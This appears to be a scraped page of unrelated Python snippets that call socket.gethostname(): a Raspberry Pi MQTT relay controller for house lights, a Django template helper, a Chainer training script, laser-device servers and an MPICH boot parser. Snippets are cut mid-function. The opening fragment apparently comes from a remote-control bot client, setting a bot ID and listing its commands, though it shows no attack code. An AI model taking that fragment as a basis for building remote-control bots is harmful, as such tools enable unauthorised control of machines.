    settings.BOT_ID = socket.gethostname()
if not utils.validate_botid(settings.BOT_ID):
    settings.BOT_ID = ''.join(
        random.choice(string.ascii_letters) for _ in range(9))


def print_help(mod=None):
    help_text = "Loaded modules:\n"
    if mod is None:
        for module in MODULES:
            help_text += "- " + module + "\n"
            help_text += sys.modules["modules." + module].help()
        help_text += """
General commands:

- cd path/to/dir : changes directory
Exemple #53
0
class MQTTBoard:
    """
    Software link to the Raspberry pi 8 relay board.
    Relay pins: (relay, chip pin, header pin) -- Init uses header pin number
    1   P5  29
    2   P6  31
    3   P13 33
    4   P16 36
    5   P19 35
    6   P20 38
    7   P21 40
    8   P26 37

    Version 0.1:
    - Create a software switch next to the normal wall switch. Connected through a hotel arrangement.
                /------------------\
       ---(relay)                    (wall switch)----------
                \------------------/

    - MQTT protocol Homie
      https://homieiot.github.io/specification/spec-core-v3_0_1/

    Future:
    - sensor pin for on/off state

    """

    hostname = str(socket.gethostname())
    print(hostname)
    if hostname == 'LightsGroundFloor':
        print("Using {0} for configuration".format(hostname))
        RELAY = [False, 29, 31, 33, 36, 35, 38, 40, 37]
        RELAY_NAME = [
            False, 'DrivewayLight', 'ToiletLight', 'light3', 'light4',
            'light5', 'light6', 'light7', 'FrontDoorLight'
        ]
        SENSOR = [False, 3, 5, 7, 11, 13, 15, 19, 21]  # Change to sensor pins
        SENSOR_NAME = [
            False, 'sensor1', 'SchakelaarTussendeur1', 'SchakelaarTussendeur2',
            'sensor4', 'sensor5', 'sensor6', 'SchakelaarVoordeur2',
            'SchakelaarVoordeur1'
        ]
        SENSOR_STATE = [False, None, None, None, None, None, None, None, None]
    elif hostname == 'LightsFirstFloor':
        print("Using {0} for configuration".format(hostname))
        RELAY = [False, 29, 31, 33, 36, 35, 38, 40, 37]
        RELAY_NAME = [
            False, 'UtilitiesRoom', 'ClosetMasterBedroom', 'light3', 'light4',
            'light5', 'light6', 'light7', 'light8'
        ]
        SENSOR = [False, 3, 5, 7, 11, 13, 15, 19, 21]  # Change to sensor pins
        SENSOR_NAME = [
            False, 'SwitchMasterBedroom1', 'SwitchMasterBedroom2',
            'SwitchEasternBlock1', 'SwitchEasternBlock2', 'sensor5', 'sensor6',
            'sensor7', 'sensor8'
        ]
        SENSOR_STATE = [False, None, None, None, None, None, None, None, None]
    else:
        print("Hostname not found")

    def __init__(self, mqtt_host='localhost', mqtt_port=1883):
        self.started = 0
        self.stopped = 0
        self.name = str(socket.gethostname())

        # MQTT setup
        self.logger = logging.getLogger('MQTTBoard')
        self.logger.setLevel(logging.DEBUG)

        # self.ch = logging.StreamHandler()
        self.ch = logging.FileHandler('/var/log/LightsControl/lc.log')

        self.ch.setLevel(logging.INFO)
        formatter = logging.Formatter(
            '%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        self.ch.setFormatter(formatter)
        self.logger.addHandler(self.ch)

        self.mqtt_client = MQTTClient(self.name, mqtt_host, mqtt_port)
        self.logger.info("MQTT connecting to {0}:{1}".format(
            mqtt_host, mqtt_port))

        self.mqtt_client.set_on_connect(self.mqtt_on_connect)
        self.mqtt_client.set_on_message(self.mqtt_on_message)

        self.mqtt_client.connect()
        self.logger.info("MQTT connected")

        self.mqtt_client.start()

        # GPIO setup
        GPIO.setmode(GPIO.BOARD)
        GPIO.setup(self.RELAY[1], GPIO.OUT)
        GPIO.output(self.RELAY[1], False)
        GPIO.setup(self.RELAY[2], GPIO.OUT)
        GPIO.output(self.RELAY[2], False)
        GPIO.setup(self.RELAY[3], GPIO.OUT)
        GPIO.output(self.RELAY[3], False)
        GPIO.setup(self.RELAY[4], GPIO.OUT)
        GPIO.output(self.RELAY[4], False)
        GPIO.setup(self.RELAY[5], GPIO.OUT)
        GPIO.output(self.RELAY[5], False)
        GPIO.setup(self.RELAY[6], GPIO.OUT)
        GPIO.output(self.RELAY[6], False)
        GPIO.setup(self.RELAY[7], GPIO.OUT)
        GPIO.output(self.RELAY[7], False)
        GPIO.setup(self.RELAY[8], GPIO.OUT)
        GPIO.output(self.RELAY[8], False)

        GPIO.setup(self.SENSOR[1], GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.setup(self.SENSOR[2], GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.setup(self.SENSOR[3], GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.setup(self.SENSOR[4], GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.setup(self.SENSOR[5], GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.setup(self.SENSOR[6], GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.setup(self.SENSOR[7], GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.setup(self.SENSOR[8], GPIO.IN, pull_up_down=GPIO.PUD_UP)

        # Publish on MQTT
        self.base_topic = "homie"
        self.device_id = self.name.replace(
            ' ',
            '_')  # Use name as device_id. Replacing spaces with underscore
        self.homie = "3.0.1"
        # self.localip = get_ip()
        # self.mac = get_mac()
        self.fw_name = "RaspiRelayboard"
        self.fw_version = "0.1"
        self.nodes = ""
        for i in range(1, 9):
            if i > 1:
                self.nodes += ","
            self.nodes += self.RELAY_NAME[i]

        for i in range(1, 9):
            self.nodes += ","
            self.nodes += self.SENSOR_NAME[i]

        self.implementation = "RaspberryPi"
        self.stats = "uptime,signal,cputemp,cpuload,freeheap,supply"
        self.stats_interval = 60

        self.topic = "{0}/{1}".format(self.base_topic, self.device_id)
        self.logger.info("Using topic {0}".format(self.topic))

        self.mqtt_publish_device()
        self.mqtt_send_stats()
        self.mqtt_send_nodes()

        self.started = 1

        sleep(0.5)
        i = 1
        while i <= 8:
            initial_power_topic = "{0}/{1}/power".format(
                self.topic, self.RELAY_NAME[i])
            self.mqtt_client.publish(initial_power_topic, "false")
            i += 1

        self.mqtt_client.publish(self.topic + "/$state", "ready")

        signal.signal(signal.SIGINT, self.handle_signal)
        self.read_switches()

        self.logger.info("Everything started and running.")

    def mqtt_publish_device(self):
        self.mqtt_client.publish(self.topic + "/$homie", self.homie)
        self.mqtt_client.publish(self.topic + "/$name", self.name)
        # self.mqtt_client.publish(self.topic + "/$localip", self.localip)
        # self.mqtt_client.publish(self.topic + "/$mac", self.mac)
        self.mqtt_client.publish(self.topic + "/$fw/name", self.fw_name)
        self.mqtt_client.publish(self.topic + "/$fw/version", self.fw_version)
        self.mqtt_client.publish(self.topic + "/$nodes", self.nodes)
        self.mqtt_client.publish(self.topic + "/$implementation",
                                 self.implementation)
        self.mqtt_client.publish(self.topic + "/$stats", self.stats)

    def mqtt_send_stats(self):
        self.logger.info("Sending stats")
        stats_topic = "{0}/$stats/".format(self.topic)

        self.mqtt_client.publish(stats_topic + "interval", self.stats_interval)

        self.mqtt_client.publish(stats_topic + "uptime", uptime())

        signal = "Not implemented yet"
        self.mqtt_client.publish(stats_topic + "signal", 0)

        cputemp = int(
            subprocess.check_output(
                ['cat', '/sys/class/thermal/thermal_zone0/temp'])) / 1000
        self.mqtt_client.publish(stats_topic + "cputemp", cputemp)

        cpuload = subprocess.check_output(['cat', '/proc/loadavg']).rstrip()
        self.mqtt_client.publish(stats_topic + "cpuload", cpuload)

        freeheap = subprocess.check_output([
            'cat', '/proc/meminfo'
        ]).decode('utf-8').split('\n')[1].replace(' ', '').split(':')[1][:-2]
        self.mqtt_client.publish(stats_topic + "freeheap", freeheap)

        supply = "Not implemented yet"
        self.mqtt_client.publish(stats_topic + "supply", 0)

        if not self.stopped:  # if not stopped stay alive
            Timer(self.stats_interval - 1, self.mqtt_send_stats).start()

    def mqtt_send_nodes(self):
        i = 1
        while i <= 8:
            self.mqtt_send_light_node(i)
            self.mqtt_send_switch_node(i)
            i += 1

    def mqtt_send_light_node(self, nr):
        self.logger.info("Sending light node {0}".format(nr))
        light_topic = "{0}/{1}/".format(self.topic, self.RELAY_NAME[nr])
        self.mqtt_client.publish(light_topic + "$name",
                                 "{0}".format(self.RELAY_NAME[nr]))
        self.mqtt_client.publish(light_topic + "$type", "light")
        self.mqtt_client.publish(light_topic + "$properties", "power")

        self.mqtt_client.publish(light_topic + "power/$name",
                                 "{0}".format(self.RELAY_NAME[nr]))
        self.mqtt_client.publish(light_topic + "power/$settable", "true")
        self.mqtt_client.publish(light_topic + "power/$retained", "true")
        self.mqtt_client.publish(light_topic + "power/$datatype", "boolean")

        if self.started == 0:
            self.mqtt_client.subscribe(light_topic + "power/set")

    def mqtt_send_switch_node(self, nr):
        self.logger.info("Sending switch node {0}".format(nr))
        switch_topic = "{0}/{1}/".format(self.topic, self.SENSOR_NAME[nr])
        self.mqtt_client.publish(switch_topic + "$name",
                                 "{0}".format(self.SENSOR_NAME[nr]))
        self.mqtt_client.publish(switch_topic + "$type", "switch")
        self.mqtt_client.publish(switch_topic + "$properties", "switch")

        self.mqtt_client.publish(switch_topic + "switch/$name",
                                 "{0}".format(self.SENSOR_NAME[nr]))
        self.mqtt_client.publish(switch_topic + "switch/$settable", "false")
        self.mqtt_client.publish(switch_topic + "switch/$retained", "true")
        self.mqtt_client.publish(switch_topic + "switch/$datatype", "boolean")

    def mqtt_on_connect(self, client, userdata, flags, rc):
        self.logger.info('Connected with result code: '.format(rc))

    def mqtt_on_message(self, client, userdata, msg):
        self.logger.info('{0} : {1}'.format(msg.topic, msg.payload))
        topic = msg.topic.split('/')
        # expecting name like 'light2'
        nr = self.RELAY_NAME.index(topic[2])
        # nr = int(topic[2][5:])
        try:
            if topic[3] == "power" and topic[
                    4] == "set" and msg.payload.decode('utf-8') == "false":
                self.light_off(nr)
                self.logger.info("Trying to turn off light {0}".format(nr))
            elif topic[3] == "power" and topic[
                    4] == "set" and msg.payload.decode('utf-8') == "true":
                self.light_on(nr)
                self.logger.info("Trying to turn on light {0}".format(nr))
            else:
                self.logger.error("Problem with message")
        except Exception as e:
            self.logger.error("Problem {0}".format(e))

    def switch_light(self, nr):
        GPIO.output(self.RELAY[nr], not GPIO.input(self.RELAY[nr]))
        # self.send_state()

    def light_off(self, nr):
        # read state and change if light on
        # if self.read_state(nr):
        #    self.switch_light(nr)
        GPIO.output(self.RELAY[nr], True)

    def light_on(self, nr):
        # read state and change if light off
        # if not self.read_state(nr):
        #    self.switch_light(nr)
        GPIO.output(self.RELAY[nr], False)

    def read_state(self, nr):
        return GPIO.input(self.SENSOR[nr])

    def handle_signal(self, signal, frame):
        print("Program signal: {0}, {1}".format(signal, frame))
        if signal == 2:  # KeyboardInterupt - Stop everything
            self.stop()

    def read_switches(self):
        i = 1
        while i <= 8:
            if self.SENSOR_STATE[i] != self.read_switch(i):
                self.SENSOR_STATE[i] = self.read_switch(i)
                switch_topic = "{0}/{1}/".format(self.topic,
                                                 self.SENSOR_NAME[i])
                self.mqtt_client.publish(switch_topic + "switch",
                                         self.SENSOR_STATE[i])
                self.logger.info("{0} changed to {1}".format(
                    self.SENSOR_NAME[i], self.SENSOR_STATE[i]))
            i += 1
        if not self.stopped:
            Timer(0.5, self.read_switches).start()

    def read_switch(self, nr):
        if self.read_state(nr):
            return "true"
        else:
            return "false"

    def stop(self):
        self.stopped = 1
        print("Waiting 5 seconds to close all threads")
        sleep(5)
        self.mqtt_client.publish(self.topic + "/$state", "disconnected")
        self.mqtt_client.disconnect()
        self.started = 0
        sys.exit()
def wrap_data(request, data=None):
    """Puts commonly used values into the template context dictionary, `data`
    """
    if data is None:
        data = {}

    # CSRF Token
    data.update(csrf(request))

    ##
    # meta, server, request info
    from htk.utils.request import get_request_metadata
    data['request'] = get_request_metadata(request)
    data['server'] = {
        'hostname' : gethostname(),
    }

    data['site_name'] = htk_setting('HTK_SITE_NAME')

    data['meta'] = {
        'title' : {
            'content' : '',
            'inverted' : [],
            'join_value' : ' | ',
            'static_values' : {},
        },
        'breadcrumbs' : {
            'url_names_to_breadcrumbs' : {},
        },
        'description' : {
            'content' : '',
            'inverted' : [],
            'join_value' : ' ',
            'static_values' : {},
         },
        'keywords' : {
            'content' : '',
            'inverted' : [],
            'join_value' : ',',
            'static_values' : {},
        },
        'site_verifications' : {},
    }

    data['privacy_url_name'] = 'privacy'
    data['robots_url_name'] = 'robots'

    ##
    # Rollbar
    data['rollbar'] = {
        'env' : settings.ROLLBAR_ENV,
        'branch' : settings.ROLLBAR.get('branch', 'master'),
        'tokens' : {
            'post_client_item' : settings.ROLLBAR_TOKEN_POST_CLIENT_ITEM,
        },
        'host_blacklist' : settings.ROLLBAR.get('host_blacklist', None),
        'host_whitelist' : settings.ROLLBAR.get('host_whitelist', None),
        'ignored_messages' : settings.ROLLBAR.get('ignored_messages', None),
        'ignored_messages_regexes' : settings.ROLLBAR.get('ignored_messages_regexes', None),
        'ignored_uncaught_exception_classes' : settings.ROLLBAR.get('ignored_uncaught_exception_classes', None),
    }

    ##
    # LESS http://lesscss.org/#usage
    asset_version = get_asset_version()
    css_ext = '%s?v=%s' % (htk_setting('HTK_CSS_EXTENSION'), asset_version,)
    useless = settings.ENV_DEV and request.GET.get('useless', False)
    data['css_rel'] = 'stylesheet/less' if useless else 'stylesheet'
    data['css_ext'] = 'less' if useless else css_ext
    data['asset_version'] = asset_version

    ##
    # Current Environment
    data['ENV_DEV'] = settings.ENV_DEV
    data['ENV_PROD'] = settings.ENV_PROD

    ##
    # Javascript reloader
    _javascript_reloader(request, data)

    ##
    # user
    if request.user.is_authenticated:
        user = request.user
    else:
        user = None
    data['user'] = user

    ##
    # errors
    data['errors'] = []

    return data
Exemple #55
0
def main():
    parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter, )
    parser.add_argument("--multi-node", action="store_true", help="multi node")
    parser.add_argument("--out", help="output directory")
    parser.add_argument("--debug", action="store_true", help="debug mode")
    parser.add_argument("--gpu", type=int, default=0, help="gpu id")
    parser.add_argument("--seed", type=int, default=0, help="random seed")
    parser.add_argument(
        "--lr",
        type=float,
        default=0.0001,
        help="learning rate",
    )
    parser.add_argument(
        "--max-epoch",
        type=int,
        default=30,
        help="max epoch",
    )
    parser.add_argument(
        "--call-evaluation-before-training",
        action="store_true",
        help="call evaluation before training",
    )

    def argparse_type_class_ids(string):
        if string == "all":
            n_class = len(morefusion.datasets.ycb_video.class_names)
            class_ids = np.arange(n_class)[1:].tolist()
        elif string == "asymmetric":
            class_ids = (
                morefusion.datasets.ycb_video.class_ids_asymmetric.tolist())
        elif string == "symmetric":
            class_ids = (
                morefusion.datasets.ycb_video.class_ids_symmetric.tolist())
        else:
            class_ids = [int(x) for x in string.split(",")]
        return class_ids

    parser.add_argument(
        "--class-ids",
        type=argparse_type_class_ids,
        default="all",
        help="class id (e.g., 'all', 'asymmetric', 'symmetric', '1,6,9')",
    )
    parser.add_argument(
        "--pretrained-model",
        help="pretrained model",
    )
    parser.add_argument(
        "--note",
        help="note",
    )
    parser.add_argument(
        "--pretrained-resnet18",
        action="store_true",
        help="pretrained resnet18",
    )
    parser.add_argument(
        "--centerize-pcd",
        action="store_true",
        help="centerize pcd",
    )
    parser.add_argument(
        "--resume",
        help="resume",
    )
    parser.add_argument(
        "--loss",
        choices=["add/add_s", "add->add/add_s|1"],
        default="add->add/add_s|1",
        help="loss",
    )
    args = parser.parse_args()

    chainer.global_config.debug = args.debug

    # -------------------------------------------------------------------------

    # device initialization
    if args.multi_node:
        import chainermn

        comm = chainermn.create_communicator("pure_nccl")
        device = comm.intra_rank
        n_gpu = comm.size
    else:
        device = args.gpu
        n_gpu = 1

    if not args.multi_node or comm.rank == 0:
        now = datetime.datetime.now(datetime.timezone.utc)
        args.timestamp = now.isoformat()
        args.hostname = socket.gethostname()
        args.githash = morefusion.utils.githash(__file__)

        termcolor.cprint("==> Started training", attrs={"bold": True})

    if args.out is None:
        if not args.multi_node or comm.rank == 0:
            args.out = osp.join(here, "logs", now.strftime("%Y%m%d_%H%M%S.%f"))
        else:
            args.out = None
        if args.multi_node:
            args.out = comm.bcast_obj(args.out)

    if device >= 0:
        chainer.cuda.get_device_from_id(device).use()

    # seed initialization
    random.seed(args.seed)
    np.random.seed(args.seed)
    if device >= 0:
        chainer.cuda.cupy.random.seed(args.seed)

    # dataset initialization
    data_train = None
    data_valid = None
    if not args.multi_node or comm.rank == 0:
        termcolor.cprint("==> Dataset size", attrs={"bold": True})

        data_ycb_trainreal = morefusion.datasets.YCBVideoRGBDPoseEstimationDatasetReIndexed(  # NOQA
            "trainreal", class_ids=args.class_ids, augmentation=True)
        data_ycb_syn = morefusion.datasets.YCBVideoRGBDPoseEstimationDatasetReIndexed(  # NOQA
            "syn", class_ids=args.class_ids, augmentation=True)
        data_ycb_syn = morefusion.datasets.RandomSamplingDataset(
            data_ycb_syn, len(data_ycb_trainreal))
        data_my_train = morefusion.datasets.MySyntheticYCB20190916RGBDPoseEstimationDatasetReIndexed(  # NOQA
            "train", class_ids=args.class_ids, augmentation=True)
        data_train = chainer.datasets.ConcatenatedDataset(
            data_ycb_trainreal, data_ycb_syn, data_my_train)
        print(f"ycb_trainreal={len(data_ycb_trainreal)}, "
              f"ycb_syn={len(data_ycb_syn)}, my_train={len(data_my_train)}")
        del data_ycb_trainreal, data_ycb_syn, data_my_train

        data_ycb_val = morefusion.datasets.YCBVideoRGBDPoseEstimationDatasetReIndexed(  # NOQA
            "val", class_ids=args.class_ids)
        data_my_val = morefusion.datasets.MySyntheticYCB20190916RGBDPoseEstimationDatasetReIndexed(  # NOQA
            "val", class_ids=args.class_ids)
        data_valid = chainer.datasets.ConcatenatedDataset(
            data_ycb_val,
            data_my_val,
        )
        print(f"ycb_val={len(data_ycb_val)}, my_val={len(data_my_val)}")
        del data_ycb_val, data_my_val

        data_train = chainer.datasets.TransformDataset(data_train, transform)
        data_valid = chainer.datasets.TransformDataset(data_valid, transform)

    if args.multi_node:
        data_train = chainermn.scatter_dataset(data_train,
                                               comm,
                                               shuffle=True,
                                               seed=args.seed)
        data_valid = chainermn.scatter_dataset(data_valid,
                                               comm,
                                               shuffle=False,
                                               seed=args.seed)

    args.class_names = morefusion.datasets.ycb_video.class_names.tolist()

    loss = args.loss
    if loss == "add->add/add_s|1":
        loss = "add"

    # model initialization
    model = contrib.models.Model(
        n_fg_class=len(args.class_names) - 1,
        centerize_pcd=args.centerize_pcd,
        pretrained_resnet18=args.pretrained_resnet18,
        loss=loss,
    )
    if args.pretrained_model is not None:
        chainer.serializers.load_npz(args.pretrained_model, model)
    if device >= 0:
        model.to_gpu()

    # optimizer initialization
    optimizer = chainer.optimizers.Adam(alpha=args.lr)
    if args.multi_node:
        optimizer = chainermn.create_multi_node_optimizer(optimizer, comm)
    optimizer.setup(model)

    if args.pretrained_resnet18:
        model.resnet_extractor.init_block.disable_update()
        model.resnet_extractor.res2.disable_update()
        for link in model.links():
            if isinstance(link, chainer.links.BatchNormalization):
                link.disable_update()

    if not args.multi_node or comm.rank == 0:
        termcolor.cprint("==> Link update rules", attrs={"bold": True})
        for name, link in model.namedlinks():
            print(name, link.update_enabled)

    # iterator initialization
    iter_train = chainer.iterators.MultiprocessIterator(
        data_train,
        batch_size=16 // n_gpu,
        repeat=True,
        shuffle=True,
    )
    iter_valid = chainer.iterators.MultiprocessIterator(
        data_valid,
        batch_size=16,
        repeat=False,
        shuffle=False,
    )

    updater = chainer.training.StandardUpdater(
        iterator=iter_train,
        optimizer=optimizer,
        device=device,
    )
    if not args.multi_node or comm.rank == 0:
        writer = tensorboardX.SummaryWriter(log_dir=args.out)
        writer_with_updater = morefusion.training.SummaryWriterWithUpdater(
            writer)
        writer_with_updater.setup(updater)

    # -------------------------------------------------------------------------

    trainer = chainer.training.Trainer(updater, (args.max_epoch, "epoch"),
                                       out=args.out)
    trainer.extend(E.FailOnNonNumber())

    @chainer.training.make_extension(trigger=(1, "iteration"))
    def update_loss(trainer):
        updater = trainer.updater
        optimizer = updater.get_optimizer("main")
        target = optimizer.target
        assert trainer.stop_trigger.unit == "epoch"

        if args.loss == "add->add/add_s|1":
            if updater.epoch_detail < 1:
                assert target._loss == "add"
            else:
                target._loss = "add/add_s"
        else:
            assert args.loss in ["add/add_s"]
            return

    trainer.extend(update_loss)

    log_interval = 10, "iteration"
    eval_interval = 0.25, "epoch"

    # evaluate
    evaluator = morefusion.training.extensions.PoseEstimationEvaluator(
        iterator=iter_valid,
        target=model,
        device=device,
        progress_bar=True,
    )
    if args.multi_node:
        evaluator.comm = comm
    trainer.extend(
        evaluator,
        trigger=eval_interval,
        call_before_training=args.call_evaluation_before_training,
    )

    if not args.multi_node or comm.rank == 0:
        # print arguments
        msg = pprint.pformat(args.__dict__)
        msg = textwrap.indent(msg, prefix=" " * 2)
        termcolor.cprint("==> Arguments", attrs={"bold": True})
        print(f"\n{msg}\n")

        trainer.extend(
            morefusion.training.extensions.ArgsReport(args),
            call_before_training=True,
        )

        # snapshot
        trigger_best_add = chainer.training.triggers.MinValueTrigger(
            key="validation/main/add_or_add_s",
            trigger=eval_interval,
        )
        trigger_best_auc = chainer.training.triggers.MaxValueTrigger(
            key="validation/main/auc/add_or_add_s",
            trigger=eval_interval,
        )
        trainer.extend(
            E.snapshot(filename="snapshot_trainer_latest.npz"),
            trigger=eval_interval,
        )
        trainer.extend(
            E.snapshot_object(model, filename="snapshot_model_latest.npz"),
            trigger=eval_interval,
        )
        trainer.extend(
            E.snapshot_object(model, filename="snapshot_model_best_add.npz"),
            trigger=trigger_best_add,
        )
        trainer.extend(
            E.snapshot_object(model, filename="snapshot_model_best_auc.npz"),
            trigger=trigger_best_auc,
        )

        # log
        trainer.extend(
            morefusion.training.extensions.LogTensorboardReport(
                writer=writer,
                trigger=log_interval,
            ),
            call_before_training=True,
        )
        trainer.extend(
            E.PrintReport(
                [
                    "epoch",
                    "iteration",
                    "elapsed_time",
                    "main/loss",
                    "main/add_or_add_s",
                    "validation/main/auc/add_or_add_s",
                ],
                log_report="LogTensorboardReport",
            ),
            trigger=log_interval,
            call_before_training=True,
        )
        trainer.extend(E.ProgressBar(update_interval=1))

    # -------------------------------------------------------------------------

    if args.resume:
        chainer.serializers.load_npz(args.resume, trainer)

    trainer.run()
Exemple #56
0
    def __init__(self, mqtt_host='localhost', mqtt_port=1883):
        self.started = 0
        self.stopped = 0
        self.name = str(socket.gethostname())

        # MQTT setup
        self.logger = logging.getLogger('MQTTBoard')
        self.logger.setLevel(logging.DEBUG)

        # self.ch = logging.StreamHandler()
        self.ch = logging.FileHandler('/var/log/LightsControl/lc.log')

        self.ch.setLevel(logging.INFO)
        formatter = logging.Formatter(
            '%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        self.ch.setFormatter(formatter)
        self.logger.addHandler(self.ch)

        self.mqtt_client = MQTTClient(self.name, mqtt_host, mqtt_port)
        self.logger.info("MQTT connecting to {0}:{1}".format(
            mqtt_host, mqtt_port))

        self.mqtt_client.set_on_connect(self.mqtt_on_connect)
        self.mqtt_client.set_on_message(self.mqtt_on_message)

        self.mqtt_client.connect()
        self.logger.info("MQTT connected")

        self.mqtt_client.start()

        # GPIO setup
        GPIO.setmode(GPIO.BOARD)
        GPIO.setup(self.RELAY[1], GPIO.OUT)
        GPIO.output(self.RELAY[1], False)
        GPIO.setup(self.RELAY[2], GPIO.OUT)
        GPIO.output(self.RELAY[2], False)
        GPIO.setup(self.RELAY[3], GPIO.OUT)
        GPIO.output(self.RELAY[3], False)
        GPIO.setup(self.RELAY[4], GPIO.OUT)
        GPIO.output(self.RELAY[4], False)
        GPIO.setup(self.RELAY[5], GPIO.OUT)
        GPIO.output(self.RELAY[5], False)
        GPIO.setup(self.RELAY[6], GPIO.OUT)
        GPIO.output(self.RELAY[6], False)
        GPIO.setup(self.RELAY[7], GPIO.OUT)
        GPIO.output(self.RELAY[7], False)
        GPIO.setup(self.RELAY[8], GPIO.OUT)
        GPIO.output(self.RELAY[8], False)

        GPIO.setup(self.SENSOR[1], GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.setup(self.SENSOR[2], GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.setup(self.SENSOR[3], GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.setup(self.SENSOR[4], GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.setup(self.SENSOR[5], GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.setup(self.SENSOR[6], GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.setup(self.SENSOR[7], GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.setup(self.SENSOR[8], GPIO.IN, pull_up_down=GPIO.PUD_UP)

        # Publish on MQTT
        self.base_topic = "homie"
        self.device_id = self.name.replace(
            ' ',
            '_')  # Use name as device_id. Replacing spaces with underscore
        self.homie = "3.0.1"
        # self.localip = get_ip()
        # self.mac = get_mac()
        self.fw_name = "RaspiRelayboard"
        self.fw_version = "0.1"
        self.nodes = ""
        for i in range(1, 9):
            if i > 1:
                self.nodes += ","
            self.nodes += self.RELAY_NAME[i]

        for i in range(1, 9):
            self.nodes += ","
            self.nodes += self.SENSOR_NAME[i]

        self.implementation = "RaspberryPi"
        self.stats = "uptime,signal,cputemp,cpuload,freeheap,supply"
        self.stats_interval = 60

        self.topic = "{0}/{1}".format(self.base_topic, self.device_id)
        self.logger.info("Using topic {0}".format(self.topic))

        self.mqtt_publish_device()
        self.mqtt_send_stats()
        self.mqtt_send_nodes()

        self.started = 1

        sleep(0.5)
        i = 1
        while i <= 8:
            initial_power_topic = "{0}/{1}/power".format(
                self.topic, self.RELAY_NAME[i])
            self.mqtt_client.publish(initial_power_topic, "false")
            i += 1

        self.mqtt_client.publish(self.topic + "/$state", "ready")

        signal.signal(signal.SIGINT, self.handle_signal)
        self.read_switches()

        self.logger.info("Everything started and running.")
status = 0
ic = None
base = None
laser = None
try: 
    # Create a communicator
    #
    ic = Ice.initialize(sys.argv)
    print "Communicator initialized..."

    # Create a proxy for the laser
    #
    # we'll use indirect proxy here to connect to the laser2d component
    # setup according to the Quick Start tutorial of Orca2
    # see: orca-robotics.sf.net/orca_doc_quickstart.html
    base = ic.stringToProxy( "laserscanner2d@"+gethostname()+"/laser2d" )
    
    # check that the object exists otherwise this will raise an exceptions
    base.ice_ping();

    print "Base proxy created..."

    # Down-cast the proxy to a Laser proxy
    #
    laser = orca.LaserScanner2dPrx.checkedCast(base)
    if laser == None:
	raise "Invalid proxy - could not downcast to a laserscanner2d proxy"
    
    print "Derived proxy created..."

    # get one laser scan and print it out
Exemple #58
0
        self.logger.log("Setting laser power to %.4fW at %s"  % (mW / 1000.0, time.strftime('%Y-%m-%d %H:%M:%S')))
        return self.send("@cobasp %.4f" % (mW / 1000.0))


    @lockComms
    def getSetPower_mW(self):
        self.write('p?')
        return 1000 * float(self.readline())


if __name__ == "__main__":
    ## Only run when called as a script --- do not run on include.
    #  This way, we can use an interactive shell to test out the class.

    from optparse import OptionParser

    parser = OptionParser()
    parser.add_option("-p", "--port", type="int", dest="net_port", default=7776, help="TCP port to listen on for service", metavar="PORT_NUMBER")
    parser.add_option("-n", "--name", dest="service_name", default='pyro561CoboltLaser', help="name of service", metavar="NAME")
    parser.add_option("-s", "--serial", type="int", dest="serial_port", default=1, help="serial port number", metavar="PORT_NUMBER")
    parser.add_option("-b", "--baud", type="int", dest="baud_rate", default=9600, help="serial port baud rate in bits/sec", metavar="RATE")
    (options, args) = parser.parse_args()

    laser = CoboltLaser(options.serial_port, options.baud_rate, 2)

    daemon = Pyro4.Daemon(port = options.net_port,
            host = socket.gethostbyname(socket.gethostname()))
    Pyro4.Daemon.serveSimple(
            {laser: options.service_name},
            daemon = daemon, ns = False, verbose = True)
Exemple #59
0
def mpdboot():
    global myHost, fullDirName, rshCmd, user, mpdCmd, debug, verbose
    myHost = gethostname()
    mpd_set_my_id('mpdboot_%s' % (myHost))
    fullDirName = path.abspath(path.split(argv[0])[0])
    rshCmd = 'ssh'
    user = mpd_get_my_username()
    mpdCmd = path.join(fullDirName, 'mpd.py')
    hostsFilename = 'mpd.hosts'
    totalnumToStart = 1  # may get chgd below
    debug = 0
    verbose = 0
    localConArg = ''
    remoteConArg = ''
    oneMPDPerHost = 1
    myNcpus = 1
    myIfhn = ''
    chkupIndicator = 0  # 1 -> chk and start ; 2 -> just chk
    maxUnderOneRoot = 4
    try:
        shell = path.split(environ['SHELL'])[-1]
    except:
        shell = 'csh'

    argidx = 1  # skip arg 0
    while argidx < len(argv):
        if argv[argidx] == '-h' or argv[argidx] == '--help':
            usage()
        elif argv[argidx] == '-r':  # or --rsh=
            rshCmd = argv[argidx + 1]
            argidx += 2
        elif argv[argidx].startswith('--rsh'):
            splitArg = argv[argidx].split('=')
            try:
                rshCmd = splitArg[1]
            except:
                print 'mpdboot: invalid argument:', argv[argidx]
                usage()
            argidx += 1
        elif argv[argidx] == '-u':  # or --user=
            user = argv[argidx + 1]
            argidx += 2
        elif argv[argidx].startswith('--user'):
            splitArg = argv[argidx].split('=')
            try:
                user = splitArg[1]
            except:
                print 'mpdboot: invalid argument:', argv[argidx]
                usage()
            argidx += 1
        elif argv[argidx] == '-m':  # or --mpd=
            mpdCmd = argv[argidx + 1]
            argidx += 2
        elif argv[argidx].startswith('--mpd'):
            splitArg = argv[argidx].split('=')
            try:
                mpdCmd = splitArg[1]
            except:
                print 'mpdboot: invalid argument:', argv[argidx]
                usage()
            argidx += 1
        elif argv[argidx] == '-f':  # or --file=
            hostsFilename = argv[argidx + 1]
            argidx += 2
        elif argv[argidx].startswith('--file'):
            splitArg = argv[argidx].split('=')
            try:
                hostsFilename = splitArg[1]
            except:
                print 'mpdboot: invalid argument:', argv[argidx]
                usage()
            argidx += 1
        elif argv[argidx].startswith('--ncpus'):
            splitArg = argv[argidx].split('=')
            try:
                myNcpus = int(splitArg[1])
            except:
